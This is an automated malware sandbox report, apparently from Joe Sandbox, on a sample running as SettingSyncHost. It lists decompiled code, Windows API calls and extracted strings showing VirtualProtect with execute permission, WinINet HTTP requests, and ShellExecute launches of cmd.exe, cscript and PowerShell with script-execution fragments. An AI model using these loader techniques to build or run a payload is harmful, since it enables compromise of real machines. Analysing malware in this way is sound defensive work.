                                                                                                                                      					 *_t152 = _t163;
                                                                                                                                      					E00393700( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900);
                                                                                                                                      					 *_t152 = _t163;
                                                                                                                                      					E003935B0( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900);
                                                                                                                                      					 *_t152 = _t163;
                                                                                                                                      					E00393460(_t117);
                                                                                                                                      					 *_t152 = _t163;
                                                                                                                                      					E00393340();
                                                                                                                                      					st0 = _t163;
                                                                                                                                      					_t143 = _t152 + 8;
                                                                                                                                      					_v36 = _v36 + 1;
                                                                                                                                      				}
                                                                                                                                      				_t144 = _t143 - 8;
                                                                                                                                      				_t160 =  *0x3bbc50;
                                                                                                                                      				 *_t144 = _t160;
                                                                                                                                      				E00393700(_t117);
                                                                                                                                      				 *_t144 = _t160;
                                                                                                                                      				E003935B0(_t117);
                                                                                                                                      				 *_t144 = _t160;
                                                                                                                                      				E00393460(_t117);
                                                                                                                                      				 *_t144 = _t160;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t160;
                                                                                                                                      				_t145 = _t144 + 8;
                                                                                                                                      				_t118 =  *(_v60 + 0x50);
                                                                                                                                      				_t75 = VirtualProtect(0x3c8900, _t118, 0x40,  &_v48); // executed
                                                                                                                                      				__eflags = _t145 - _t145;
                                                                                                                                      				E003931A1(_t75, _t145 - _t145);
                                                                                                                                      				_t146 = _t145 - 8;
                                                                                                                                      				_t161 =  *0x3bbc50;
                                                                                                                                      				 *_t146 = _t161;
                                                                                                                                      				E00393700(_t118);
                                                                                                                                      				 *_t146 = _t161;
                                                                                                                                      				E003935B0(_t118);
                                                                                                                                      				 *_t146 = _t161;
                                                                                                                                      				E00393460(_t118);
                                                                                                                                      				 *_t146 = _t161;
                                                                                                                                      				_t80 = E00393340();
                                                                                                                                      				st0 = _t161;
                                                                                                                                      				_push(_t118);
                                                                                                                                      				E003931C4(0x39256c);
                                                                                                                                      				_t82 = _t80;
                                                                                                                                      				__eflags = _t130 - _t146 + 0x104;
                                                                                                                                      				return E003931A1(_t82, _t130 - _t146 + 0x104);
                                                                                                                                      			}

                                                                                                                                      APIs
                                                                                                                                      • _memmove.LIBCMT ref: 00392328
                                                                                                                                      • _memmove.LIBCMT ref: 0039248C
                                                                                                                                      • VirtualProtect.KERNELBASE(003C8900,?,00000040,?), ref: 00392509
                                                                                                                                      • @_RTC_CheckStackVars@8.LIBCMT ref: 0039254E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memmove$CheckProtectStackVars@8Virtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1924416307-0
                                                                                                                                      • Opcode ID: 75493b0b539680b8790e5ef646e7770ef102b8304c9e0ffad48aabfe96512fbc
                                                                                                                                      • Instruction ID: f12480fbb02fb880399d2554c2c4fe9ef0c6500c0219050c3da5bd36f672b1b5
                                                                                                                                      • Opcode Fuzzy Hash: 75493b0b539680b8790e5ef646e7770ef102b8304c9e0ffad48aabfe96512fbc
                                                                                                                                      • Instruction Fuzzy Hash: 326102B4904409D6CF0ABF69E88A4BDFFB4EF44719F0149A9F4C05A191EF318A68C75A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 978 3d12a0-3d12d9 979 3d1338 978->979 980 3d12db-3d12df 978->980 981 3d133a-3d133f 979->981 982 3d12e1 980->982 983 3d12e3-3d12e7 980->983 984 3d1347-3d135a 981->984 985 3d1341-3d1343 981->985 982->983 986 3d12e9 983->986 987 3d12eb-3d1310 HttpOpenRequestA 983->987 985->984 986->987 987->979 988 3d1312-3d1318 987->988 989 3d131c-3d132f HttpSendRequestW 988->989 990 3d131a 988->990 991 3d135d-3d1362 989->991 992 3d1331-3d1332 InternetCloseHandle 989->992 990->989 993 3d136a-3d1373 InternetCloseHandle 991->993 994 3d1364-3d1366 991->994 992->979 993->981 994->993
                                                                                                                                      APIs
                                                                                                                                      • HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00000000,00000001), ref: 003D1306
                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 003D1327
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D1332
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D136B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandleHttpInternetRequest$OpenSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2920616234-0
                                                                                                                                      • Opcode ID: d15f422d57142ba9d076200d5c0d32e9ef271e4190639fcf53f94bd335f83ecf
                                                                                                                                      • Instruction ID: 983efb7d5076f6deaf48c64dcf7088cbc23059c840d546087e527ee789db7ca2
                                                                                                                                      • Opcode Fuzzy Hash: d15f422d57142ba9d076200d5c0d32e9ef271e4190639fcf53f94bd335f83ecf
                                                                                                                                      • Instruction Fuzzy Hash: 6E21AD36701604BFEB26CF50DC44FAAB7A8FF06710F14456AE9169B780CB71AC41CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1070 3cb580-3cb5f6 call 3d9dea 1073 3cb5f8-3cb5fa call 3da0cd 1070->1073 1074 3cb616-3cb620 call 3d9d9d 1070->1074 1077 3cb5ff-3cb613 1073->1077
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003CB5AB
                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003CB5FA
                                                                                                                                        • Part of subcall function 003DA0CD: _Yarn.LIBCPMT ref: 003DA0EC
                                                                                                                                        • Part of subcall function 003DA0CD: _Yarn.LIBCPMT ref: 003DA110
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                      • String ID: bad locale name
                                                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • _free.LIBCMT ref: 003E3794
                                                                                                                                      • _free.LIBCMT ref: 003E37C2
                                                                                                                                      • _free.LIBCMT ref: 003E3805
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3291180501-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00000000,00000001), ref: 003D1306
                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 003D1327
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D1332
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HttpRequest$CloseHandleInternetOpenSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 324341184-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe$_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1303422935-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D0626
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 003CA4FE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2659868963-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5C62: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,003E5BB2,00000001,00000364,00000006,000000FF,?,003DB376,?,?,?,00000000), ref: 003E5CA3
                                                                                                                                      • _free.LIBCMT ref: 003E1FAA
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 314386986-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • gethostname.WS2_32(?,00000100), ref: 003CD32F
                                                                                                                                      Similarity
                                                                                                                                      • API ID: gethostname
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 144339138-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,003E5BB2,00000001,00000364,00000006,000000FF,?,003DB376,?,?,?,00000000), ref: 003E5CA3
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5D2B
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003DF6D3
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1353095263-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003DAAFE
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003DAB0C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003DAB1D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003DAB2E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003DAB3F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003DAB50
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 003DAB61
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003DAB72
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 003DAB83
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003DAB94
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003DABA5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003DABB6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003DABC7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003DABD8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003DABE9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003DABFA
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003DAC0B
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003DAC1C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 003DAC2D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 003DAC3E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003DAC4F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003DAC60
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 003DAC71
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 003DAC82
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 003DAC93
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 003DACA4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003DACB5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 003DACC6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003DACD7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003DACE8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 003DACF9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003DAD0A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 003DAD1B
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 003DAD2C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 003DAD3D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 003DAD4E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 003DAD5F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 003DAD70
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 003DAD81
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 003DAD92
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 003DADA3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                      • API String ID: 667068680-295688737
                                                                                                                                      • Opcode ID: 766d72e2bb217171e5a08b75918163b86a397bbce55976326c0a9001fce33349
                                                                                                                                      • Instruction ID: 5815903644989b7d8de8c8c79957e57846d26042c4d5a17a2212c0b2e7ff7817
                                                                                                                                      • Opcode Fuzzy Hash: 766d72e2bb217171e5a08b75918163b86a397bbce55976326c0a9001fce33349
                                                                                                                                      • Instruction Fuzzy Hash: AE616D72952354AFC706AFB4AD0DEB73AACAA0970DB00457BF241E6360DBF54051CF5A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003D87F0: __Xtime_get_ticks.LIBCPMT ref: 003D882A
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 003D3CA8
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D3D8B
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D3F05
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cscript.exe,?,00000000,00000000), ref: 003D424F
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D4330
                                                                                                                                        • Part of subcall function 003CEFD0: Concurrency::cancel_current_task.LIBCPMT ref: 003CF103
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 003D4FA8
                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 003D4FB3
                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 003D4FC5
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D5142
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D5405
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Ios_base_dtorstd::ios_base::_$ExecuteShell$Concurrency::cancel_current_task$DeleteFileSleepXtime_get_ticks
                                                                                                                                      • String ID: $body = [IO.File]::ReadAllText('$')$.exe$.js$.ps$//e:jsc$/C powershell "$C:\Windows\System32\cmd.exe$C:\Windows\System32\cscript.exe$Incorrect format1$Incorrect format2$failed start exe$open$ript
                                                                                                                                      • API String ID: 1949390-2123262116
                                                                                                                                      • Opcode ID: f42aebf50bdf17f71b4b78be627a1de55b78d000eab3f2622823b3dd51b16c54
                                                                                                                                      • Instruction ID: eb1ad73e7a4f0698df6968cc2367f7e719b4209dd94d715e959acf90c0193b80
                                                                                                                                      • Opcode Fuzzy Hash: f42aebf50bdf17f71b4b78be627a1de55b78d000eab3f2622823b3dd51b16c54
                                                                                                                                      • Instruction Fuzzy Hash: FBF2E372A002588FDB1ACF68DD84BDDBBB5AF49304F24819EE449AB381D7759E80CF51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,003E25CA,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 003EDDCE
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003E25CA,?,?,?,00000055,?,-00000050,?,?), ref: 003EDDF9
                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 003EDE8D
                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 003EDE9B
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 003EDF5C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                      • String ID: utf8
                                                                                                                                      • API String ID: 4147378913-905460609
                                                                                                                                      • Opcode ID: 743f63fe6a930b5645a7bd844ada899ce04c68cdbf497b52e5e022d26d1b83b1
                                                                                                                                      • Instruction ID: fa07e2a19c42b2544dbb2496a1c6e25027ab5f190cff1eb81d33aa0468ea9af4
                                                                                                                                      • Opcode Fuzzy Hash: 743f63fe6a930b5645a7bd844ada899ce04c68cdbf497b52e5e022d26d1b83b1
                                                                                                                                      • Instruction Fuzzy Hash: 777105716003A6AADB27AB36CC46BBB73A8EF44740F154629F905DF5C1EB70ED408760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                      • Opcode ID: 1380290381dfa74862a2a8a953a8ea7c4a02851008230a4003791ff135ef0d28
                                                                                                                                      • Instruction ID: 8e8876585f2a3192a7164891f8e2f219964f2a430d1d1f3f63ab18d5ede3bbbb
                                                                                                                                      • Opcode Fuzzy Hash: 1380290381dfa74862a2a8a953a8ea7c4a02851008230a4003791ff135ef0d28
